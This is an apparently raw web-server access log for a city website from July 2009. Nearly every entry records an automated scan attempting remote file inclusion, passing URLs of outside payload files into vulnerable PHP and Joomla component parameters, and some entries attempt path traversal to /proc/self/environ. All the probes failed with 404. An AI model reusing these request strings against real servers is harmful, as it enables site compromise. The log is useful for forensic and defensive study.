60.251.217.4 - - [01/Jul/2009:01:40:26 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:40:31 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.55.106.140 - - [01/Jul/2009:01:40:47 -0700] "GET /Downloads/ HTTP/1.1" 200 671 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:40:59 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:41:02 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:41:02 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:41:18 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:41:18 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:41:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:41:51 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:41:52 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:41:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:42:28 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:42:33 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:42:33 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:42:48 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:43:13 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:43:58 -0700] "GET /logs/access_080330.log/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.232.68.137 - - [01/Jul/2009:01:43:58 -0700] "GET /logs/access_080531.log/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:44:33 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:47:10 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:47:10 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:47:10 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:47:11 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:47:12 -0700] "GET /components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:01:47:12 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:47:27 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:01:51:56 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:01:52:17 -0700] "GET /logs/access_080531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /logs/access_080531.log//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /logs/access_080531.log//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:01:54:10 -0700] "GET /logs/access_080531.log//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:01:56:18 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:01:56:19 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:01:56:19 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:58:47 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:58:47 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:58:47 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:58:53 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:58:53 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
141.223.5.13 - - [01/Jul/2009:01:59:03 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.185 - - [01/Jul/2009:02:01:34 -0700] "GET /logs/access_080330.log%20/errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.140.23.185 - - [01/Jul/2009:02:01:34 -0700] "GET /errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.140.23.185 - - [01/Jul/2009:02:01:34 -0700] "GET /logs/errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:01:50 -0700] "GET /logs/access_080531.log%20%20//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:01:51 -0700] "GET /logs/access_080531.log%20%20//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:02:02:27 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:02:02:27 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:02:02:27 -0700] "GET /logs/access_090401.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:02:53 -0700] "GET /logs/access_080531.log%20%20//bemarket/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:02:03:22 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:03:28 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:03:28 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:03:28 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:03:36 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:03:37 -0700] "GET /components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:03:38 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:04:35 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.238.52.141 - - [01/Jul/2009:02:05:17 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.238.52.141 - - [01/Jul/2009:02:05:17 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.238.52.141 - - [01/Jul/2009:02:05:17 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:05:19 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:05:19 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:05:19 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:02:06:11 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:02:06:11 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:02:06:11 -0700] "GET /logs/access_090401.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:02:06:12 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.239.9.2 - - [01/Jul/2009:02:06:15 -0700] "GET /logs/access_081001.log//index.php?option=com_custompages&cpage=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
87.239.9.2 - - [01/Jul/2009:02:06:15 -0700] "GET /index.php?option=com_custompages&cpage=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
87.239.9.2 - - [01/Jul/2009:02:06:15 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:02:06:17 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:06:38 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:06:38 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:06:38 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:02:06:42 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:02:06:42 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:02:06:42 -0700] "GET /logs/access_090401.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:02:06:58 -0700] "GET /logs/access.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:02:06:58 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:02:06:58 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:02:07:11 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:02:07:11 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:02:07:11 -0700] "GET /logs/access.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.239.9.2 - - [01/Jul/2009:02:07:16 -0700] "GET /logs/access_080601.log//index.php?option=com_custompages&cpage=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:02:07:17 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:02:07:22 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [01/Jul/2009:02:07:56 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:02:08:09 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [01/Jul/2009:02:08:33 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:08:52 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:08:54 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.238.52.141 - - [01/Jul/2009:02:09:09 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:02:09:15 -0700] "GET /logs/access.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:29 -0700] "GET /logs////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:29 -0700] "GET ///components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:29 -0700] "GET /logs/access_080531.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:30 -0700] "GET ///components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:30 -0700] "GET /logs////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:30 -0700] "GET /logs/access_080531.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
